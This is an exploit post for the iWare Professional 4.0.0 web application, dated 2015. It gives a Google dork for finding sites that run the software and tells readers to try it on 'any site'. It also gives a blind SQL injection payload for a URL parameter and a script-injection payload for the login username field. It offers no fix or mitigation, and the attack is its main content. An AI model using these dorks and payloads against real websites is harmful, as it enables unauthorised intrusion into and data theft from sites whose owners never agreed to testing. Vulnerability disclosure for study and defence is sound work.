facebook facebook twitter rss

iWare™ Professional 4.0.0 (Blind Sql Injection + XSS)

Author: Sniper Pex , Published: 31-03-2015
######################################
- Exploit Title: iWare™ Professional 4.0.0 (Blind Sql Injection + XSS)
- Found By: Sniper Pex
- From: Team Wolf Morrocan
- City: Marrakech , Morocco
- Tested On: Winxp SP3
######################################

.::Infos To Find Vulnerable Sites::.
##########################################
-Dorks:
1: "Powered By iWare™ Professional 4.0.0"
2: USE Your Mind
##############################################

.::Exploit / P0c::. <Blind Sql Injection>
#####################################################
- Put The Dork In google Search And Navigate Any Site
And In The Url Put ?D=-1%27%20or%2091%20%3d%20%2789
Exemple:
http://anysite/path/?D=-1%27%20or%2091%20%3d%20%2789
And You Can See Sql Error Msg
########################################################

.::Exploit / P0c::. <XSS>
#####################################################
- If You Find Site
Just Put In The Username Field '"()&%1<ScRiPt >prompt(944579)</ScRiPt>
Exemple:
Username : '"()&%1<ScRiPt >prompt(944579)</ScRiPt>
Password :
And You Can See Xss Msg
########################################################

.::Contact Me::.
#######################################
Email: Wassline@gmail.com
Facebook: http://fb.com/nassime.asrir
#########################################

.::Greetz To::.
#################################################################
Allah & All Arabian Muslims Hacker & My Friend Moroccan Red Light
Wgaaaaaaaaaaaaa3 Wlad Lmaghrib Wlad Marrakech L3zzz
#################################################################

Like us on Facebook :